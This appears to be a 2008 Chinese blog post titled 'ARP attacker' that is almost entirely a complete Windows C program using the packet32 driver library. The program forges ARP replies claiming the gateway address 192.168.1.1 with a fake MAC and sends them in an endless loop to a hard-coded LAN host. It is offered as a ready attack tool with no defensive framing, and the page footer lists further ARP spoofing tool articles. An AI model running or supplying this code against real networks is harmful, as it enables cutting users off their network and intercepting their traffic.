arp攻击器

最新推荐文章于 2024-04-24 13:01:02 发布
最新推荐文章于 2024-04-24 13:01:02 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网络编程 Visual C++信息安全编程 网络安全 文章标签: header buffer struct dst delete null
arp攻击器
2008-10-23 17:53


#include <winsock2.h>
#include <stdio.h>
#include <Iphlpapi.h>
#include "packet32.h"


#pragma comment(lib, "packet.lib") 
#pragma comment(lib, "WS2_32.lib")
#pragma comment(lib, "Iphlpapi.lib")

typedef struct tagAdapterInfo
{
char szDeviceName[128];              // 名字
char szIPAddrStr[16];                  // IP
char szHWAddrStr[18];                // MAC
DWORD dwIndex;                     // 编号          
bool filled;//是否取得了网卡信息
}INFO_ADAPTER, *PINFO_ADAPTER;


typedef struct _et_header    //以太网头部
{
    unsigned char   eh_dst[6]; //真实的MAC地址
    unsigned char   eh_src[6]; //虚拟的MAC地址
    unsigned short eh_type;    //arp报文类型 0x0806
}ET_HEADER;

#pragma pack(1)
typedef struct _arp_header   //ARP头部
{
    unsigned short arp_hdr; //硬件地址类型 以太网 0x0001
    unsigned short arp_pro; //上层协议地址类型   IP协议 0x0800
    unsigned char   arp_hln; //MAC地址长度 0x06
    unsigned char   arp_pln; //IP地质长度 0x04
    unsigned short arp_opt; //操作码 0x0001 请求 0x0002 应答
    unsigned char   arp_sha[6]; //发送方 MAC
    unsigned long   arp_spa;    //发送方 IP
    unsigned char   arp_tha[6]; //接收方 MAC
    unsigned long   arp_tpa;    //接收方 IP
}ARP_HEADER; 
#pragma pack()


//入口参数:指向INFO_ADAPTER结构数组的指针(数组大小依本机网卡数量而定)

//返回值:

//-1函数执行失败非零为本机网卡的数量


int GetLocalAdapterList(PINFO_ADAPTER infoAdapterList)
{

   ULONG     dwSize=0;
   PIP_ADAPTER_INFO pAdapter=NULL;           // 定义PIP_ADAPTER_INFO结构存储网卡信息
   int      nAdapterIndex = 0;
   char strTemp[128];

   //获得网卡列表信息串长度
   DWORD dwRet = GetAdaptersInfo(pAdapter, &dwSize);

   if (dwRet != ERROR_BUFFER_OVERFLOW)
{
   printf("不能获得网卡信息结构大小!");
   return -1;
   }

    pAdapter = (PIP_ADAPTER_INFO)new(char[dwSize]);
    dwRet = GetAdaptersInfo(pAdapter, &dwSize);
   if (dwRet != ERROR_SUCCESS)
   {
   printf("获得网卡信息失败!");
   delete pAdapter;
   return -1;
}
   //枚举获得获得网卡信息
   while (pAdapter)      
{
   // 网卡名字
   lstrcpy(strTemp, "\\Device\\NPF_");                     
    lstrcat(strTemp,pAdapter->AdapterName); //构造网卡名字              
   lstrcpy(infoAdapterList[nAdapterIndex].szDeviceName,strTemp);
   // IP
   lstrcpy(infoAdapterList[nAdapterIndex].szIPAddrStr,pAdapter->IpAddressList.IpAddress.String);
   // MAC
   sprintf(infoAdapterList[nAdapterIndex].szHWAddrStr, "%02x%02x%02x%02x%02x%02x", \
   pAdapter->Address[0],pAdapter->Address[1],pAdapter->Address[2], \
   pAdapter->Address[3],pAdapter->Address[4],pAdapter->Address[5]);
   // 网卡编号
   infoAdapterList[nAdapterIndex].dwIndex = pAdapter->Index;          
   pAdapter = pAdapter->Next;
   nAdapterIndex ++;
   }
   delete pAdapter;
   return nAdapterIndex;
}

void StrToMac(char *str,unsigned char *mac)
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
   str1=str+1;
   switch(*str)
   {
   case 'a' : high=10;break;
   case 'b': high=11;break;
   case 'c': high=12;break;
   case 'd': high=13;break;
   case 'e': high=14;break;
   case 'f': high=15;break;
   default: temp=*str;
    high=atoi(&temp);
   }
   switch(*str1)
   {
   case 'a' : low=10;break;
   case 'b': low=11;break;
   case 'c': low=12;break;
   case 'd': low=13;break;
   case 'e': low=14;break;
   case 'f': low=15;break;
   default:temp=*str1;
    low=atoi(&temp);
   }
   mac[i]=high*16+low;
   str+=2;
}
}


int main()
{

    INFO_ADAPTER infoAdapterList[10];
    int adaptercout = GetLocalAdapterList(infoAdapterList);
    printf("本机器有%d块网卡\n\n",adaptercout);
    for(int i=0;i<adaptercout;i++)
    printf("%d: %s: %s\n\n",i+1,infoAdapterList[i].szIPAddrStr,infoAdapterList[i].szDeviceName);
    LPADAPTER lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)infoAdapterList[0].szDeviceName);
if(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
   printf("acketOepnAdapter Error!\r\n");
   return -1;
}
     
unsigned char MY_MAC[6]={0};
unsigned char HE_MAC[6]={0xaa,0xaa,0xaa,0xaa,0xaa,0xaa};
    StrToMac(infoAdapterList[0].szHWAddrStr,MY_MAC);

    
ET_HEADER et_header;
ARP_HEADER arp_header;
memcpy(et_header.eh_dst,MY_MAC,6);
memcpy(et_header.eh_src,HE_MAC,6);
    et_header.eh_type=htons(0x0806);

arp_header.arp_hdr=htons(0x0001);
arp_header.arp_pro=htons(0x0800);
    arp_header.arp_hln=0x06;
arp_header.arp_pln=0x04;
arp_header.arp_opt=htons(0x0002);

    arp_header.arp_spa=inet_addr("192.168.1.1"); 
    memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr("192.168.66.207"); 
    memcpy(arp_header.arp_tha,et_header.eh_dst,6); 

    char buffer[512]={0};
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));


LPPACKET lpPacket;

lpPacket=PacketAllocatePacket(); //分配内存

PacketInitPacket(lpPacket,buffer,64);//初始化

if(PacketSetNumWrites(lpAdapter,4)==FALSE) //设置发送次数
{
   printf("设置发送次数失败!\r\n");
   return 0;
}
while(TRUE)
{
   if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE) //发送包
   {
    printf("发送失败!\r\n");
            return -1;
   }
   Sleep(2000);
   printf("\r\nQQ 549780886");
}

PacketFreePacket(lpPacket);//释放内存
PacketCloseAdapter(lpAdapter); //关闭网卡
  
return 1;
}

cosmoslife
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
局域网ARP攻击检测
04-16
局域网arp攻击检测,挺好用的,操作简单,上次公司中永恒之蓝这东西就立下了汗马功劳
ARP攻击防护工具ARP攻击防护工具ARP攻击防护工具
05-23
ARP攻击防护工具ARP攻击防护工具ARP攻击防护工具ARP攻击防护工具
ARP 攻击神ARP Spoof 保姆级教程
最新发布
Flag少侠的博客
04-24 3015
arpspoof是一种网络工具,用于进行ARP欺骗攻击。它允许攻击者伪造网络设备的MAC地址,以欺骗其他设备,并截获其通信。arpspoof工具通常用于网络渗透测试和安全评估,以测试网络的安全性和漏洞。以下是arpspoof工具的一些特点和用法:1. 支持ARP欺骗攻击:arpspoof工具可以伪造ARP响应,欺骗目标设备将其通信流量发送到攻击者的设备上,从而截获通信数据。
ARP攻击--(ArpSpoof 欺骗工具)
m0_62665450的博客
11-10 5859
ArpSpoof --(ARP欺骗工具) 实现中间人攻击
ARP攻击检测工具,比较不错的局域网软件
09-05
本软件ARP攻击检测工具来自网络或由网友发布,本站提供免费下载,软件ARP攻击检测工具仅供学习网络安全技术所用,软件经过本站软件测试,为了安全,大家还是自行测试。学习过程中请遵循国家相关法律法规。 版权申明:本站软件大部分来自网络,如有问题可以联系网站管理员,谢谢!如果觉得本站对你有用,可以收藏本站到收藏夹.
局域网ARP攻击免疫.zip
04-10
内网攻击防御软件干什么用?本软件的主要功能是监视当前电脑上传流量,当超过5M/S后则进行自动检测,检测是否正常网络应用,如果不是,则强行重起电脑!因此对于公司还具有网吧绝对是款好安全软件!完全不影响网吧内...
arp数据包生成
02-14
5. **安全风险**:值得注意的是,尽管ARP数据包生成在合法用途下很有价值,但如果不恰当使用,可能会被滥用于执行ARP欺骗攻击,导致数据泄露、网络中断等严重后果。 6. **使用技巧**:在使用ARP数据包生成时,...
局域网ARP攻击免疫
03-20
局域网ARP攻击免疫是一种专门用于保护个人电脑和整个局域网络安全的工具。ARP(Address Resolution Protocol,地址解析协议)是TCP/IP协议栈中的一个关键组件,它负责将IP地址转换为MAC(物理)地址,以便在局域网...
ARP扫描.exe
04-15
ARP扫描是一个局域网mac地址扫描,它可以扫描局域网中所有电脑的MAC地址,并把IP和对应的网卡 MAC 地址以列表的形式的呈现给您,在处理ARP攻击的时候,有一定的辅助作用。
ARP攻击模拟工具 第一代
10-13
实现模拟以太网的ARP欺骗攻击和IP地址冲突攻击。 此为本人早期作品,固比较简陋和不完善,漏洞及错误之处可能较多请多多包涵! 开发环境为vs2005 + winpcap 4.0.2 编译需要导入winpcap 4.0.2 lib库 使用之前需安装winpcap4.0.2驱动 包含程序及源码
Arp攻击网段内所有活动IP的Windows服务
12-05
扫描网段内的所有活动IP,然后向活动IP的主机向送Arp攻击数据包。包含源代码及服务的安装程序和所需要的动态库
网络安全 中间人攻击-ARP欺骗 工具:Cain
weixin_46067990的博客
04-24 6936
两台虚拟机:A和B,A中有工具Cain A是攻击机, B是靶机 首先,在B中使用cmd查看IP地址,注意网关 再查看B的ARP表 都查看完之后,回带有工具的虚拟机A中,打开Cain 下面开始在Cain中进行ARP毒化: 开启监听 开始嗅探:Sniffer——先清除以前的记录——添加扫描列表——选择目标,开启ARP毒化 这里面现在可能会以前的扫描记录,右击空白处,然后选择“remove all”,就可以清除以前的记录了 点击蓝色的加号,然后在target里选择range,我们自
apr攻击工具_ARP攻击说明
weixin_39590453的博客
11-27 522
ARP(Address Resolution Protocol),中文解释为地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。ARP大致工作流程如下:1 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址。2 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。3 地址...
ARP断网欺骗攻击利用工具
dl1286670932的博客
10-09 3424
这款软件界面很简单,功能单一,一键式启动,这里选择好自己的网卡设备,会自动填入你的网关以及IP地址,只要填写你想欺骗的IP地址之后点击ARP断网攻击就可以开始攻击了。简单的说就是在同一局域网下可以断掉别人的网络,并且可以实现获取别人的浏览信息,或者获取到账号密码等,当然这是违法的!参数-t target 指定一个特殊的、将被ARP毒化的主机(如果没有指定,则是局域网中所有主机)。
ARP伪造使用抓包工具进行ARP欺骗arp伪造攻击
cbc_19的博客
09-21 3377
ARP 在局域网中,网络以“帧”的形式传输数据,一个主机要和另一个主机进行直接通信,就必须要知道目标主机的MAC地址。显然,在双方通信之初,发送方是无法知道目标主机的MAC地址的。那么,目标主机的MAC地址,它就是通过“地址解析协议”获得的。所谓的“地址解析”就是主机在发送“帧”之前,将目标主机的“IP地址”转换成目标主机的“MAC地址”的过程。
ARP限制网络攻击——TC工具
m0_51957299的博客
08-23 292
在Linux中,流量控制都市通过TC这个工具来完成的。通常,通常要网卡进行流量控制的配置,需要进行如下的步骤:1、为网卡配置一个队列;2、在该队列上建立分类;3、根据需要建立子队列和子分类;4、为每个分类建立过滤。TC是通过限制网卡的速度来限制对方的,是一种杀敌一千自伤八百的手段。QDisc(排队规则):它是理解流量控制的基础,无论何时,内核如果需要通过某个网络接口发送数据包,它都需要按照这个接口配置的qdisc把这个数据包加入队列。
KALI ARP攻击工具使用指南
weixin_58224440的博客
08-30 181
命令:Python3 ARP-tool.py。1.需要把虚拟机网络设置为桥接模式。
ARP攻击与欺骗及防御 和 ettercap工具的使用
H_zcn的博客
11-12 805
Ettercap是一款专业的中间人攻击工具。其利用ARP的缺陷进行攻击,在目标主机与服务之间充当中间人,嗅探两者之间的数据流量,从中窃取目标主机的数据资料。该工具有窗口操作和文本两种模式。窗口模式ettercap -G 以root权限启动启动命令进来之后就是应该默认配置的页面,Primary interface是设置默认网卡的地方,应为我这里是使用的kali来进行的实验,所以默认的网卡是eth0,点击 √ 就开始主机发现。
ARP 攻击神:Macof 保姆级教程
Flag少侠的博客
04-05 801
macof 是一个用于生成伪造数据流的网络工具,常用于进行网络攻击和测试。它的主要作用是生成大量的伪造 MAC 地址的数据包,并将这些数据包发送到网络中,从而混淆网络设备的 MAC 地址表,导致网络拥堵或服务中断。:macof 能够生成大量的具有随机 MAC 地址的数据包,并发送到目标网络中,使得网络设备的 MAC 地址表被填满,无法正确识别真实的网络设备。:通过发送大量的伪造数据流,macof 可以导致网络拥堵,影响正常的网络通信,甚至使网络服务不可用。
给出arp攻击的防御方案
04-19
为防止ARP攻击,可以采取的预防措施包括: 1. 加强对网络拓扑结构设计的评估,避免大量广播域存在于同一网络中; 2. 采用交换机代替集线,限制广播域的范围,并开启端口MAC地址绑定功能; 3. 禁止所有非授权...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值